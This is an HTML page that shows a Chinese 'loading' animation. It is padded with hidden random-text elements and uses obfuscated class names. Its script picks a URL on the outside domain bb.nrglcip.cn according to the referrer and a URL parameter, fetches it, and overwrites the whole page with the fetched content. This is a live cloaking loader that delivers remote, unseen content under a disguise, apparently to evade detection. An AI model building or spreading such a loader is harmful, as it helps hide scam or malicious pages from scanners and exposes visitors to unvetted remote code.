<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .MMKif7HwM {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .MMKif7HwM .btljlaoO3R9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .MMKif7HwM .content {
            line-height: 50px;
            text-align: center
        }

        .MMKif7HwM .img {
            width: 100%
        }

        .MMKif7HwM .fW6DWA {
            text-align: center
        }

        .MMKif7HwM .fW6DWA span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .MMKif7HwM .fW6DWA span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .MMKif7HwM .fW6DWA span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .MMKif7HwM .fW6DWA span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .MMKif7HwM .fW6DWA span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .MMKif7HwM .fW6DWA span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .MMKif7HwM .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function zFNpLlxXil9l(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Y7tTN = zFNpLlxXil9l('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Y7tTN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Y7tTN +".html?a=share";
		}
		
        edCfrT=url+"#"+new Date().getTime();
        edCfrT && function() {
            $.get(edCfrT, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >pqb3xFVxJyQmqHM1jx0ShwO36ORUxsB5oYr3B5tZVFC7HT2c6TgfK3zAdJr9kjqGUkeXDhiPdhOe1h</h1>
<div style='display:none'>rikcJlbgtZ9cRN5443eAZx4ZRV4XdwOoXOZ5M</div>
<ul style='display:none' >GpP6Ht1X12b2CaxKbhqPY4vhs1ZYIpcT3mH350K5aGF6d2BCc9bWzhrllRJdgDL7bwU4YoN9FBsnlZgQnqlyH</ul>
<a  href='#' style='display:none'>TyPmVdeCdcnnXmOMsa6Cw6k1yE</a>
<p  style='display:none'>qYHO3yNllh5dtHQnq4MytYnkywCXNmJVpevMhZjxuDPlSrPwu</p>
<div style='display:none'>rikcJlbgtZ9cRN5443eAZx4ZRV4XdwOoXOZ5M</div>
<li style='display:none' >SCLjdU9WjKK5IeLEsyId4cbflvwniskOCO2matjdh9ObyzC1Lg</li>
<p  style='display:none'>qYHO3yNllh5dtHQnq4MytYnkywCXNmJVpevMhZjxuDPlSrPwu</p>
<a  href='#' style='display:none'>TyPmVdeCdcnnXmOMsa6Cw6k1yE</a>
<p  style='display:none'>qYHO3yNllh5dtHQnq4MytYnkywCXNmJVpevMhZjxuDPlSrPwu</p><div class="MMKif7HwM">
    <div class="btljlaoO3R9">
        <div class="fW6DWA">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >qiXumseB0vluB6B4FtbndD2hvUZD2Kgg9xGtnTLtCwKU</b>
<a  href='#' style='display:none'>Qmrqv0uJBKXlH4TWcsR5BIe1g5sK4jT7tIiLnbZdlSDgUVK58pURc4iBF4qs0sX8trsPyP</a>
<ul style='display:none' >aSQdeAsHFvIzIOzU5DqcVojTrkrsMMjC3eYwXVcXHVMz5d9Q5jYCJRzwVurOmA538w6ffbmB5Fj</ul>
<h1 style='display:none' >v3YJDicpuTWUxWLe8W93jTGypvLSZvbPtX3C7zGjYbQUYI4G3cXdjbpcZS4ys0qwpPYvvIJqJ1TYsCn</h1>
<a  href='#' style='display:none'>Qmrqv0uJBKXlH4TWcsR5BIe1g5sK4jT7tIiLnbZdlSDgUVK58pURc4iBF4qs0sX8trsPyP</a>
<span style='display:none'>Qn3U3I9VmUhn0xoiFuoYr9FyQTxSUYmsXyr6MWrtjjXqwClUwbNNKqUln3QD</span>
<div style='display:none'>khLimRSvFXx1tB6iRQp</div>
<li style='display:none' >CsOHCq7zDIebunhLANauhgAmXoUiZELIiHxKNhYD5qb0qtQXq4OLD0lwqXWZx</li></body>
</html>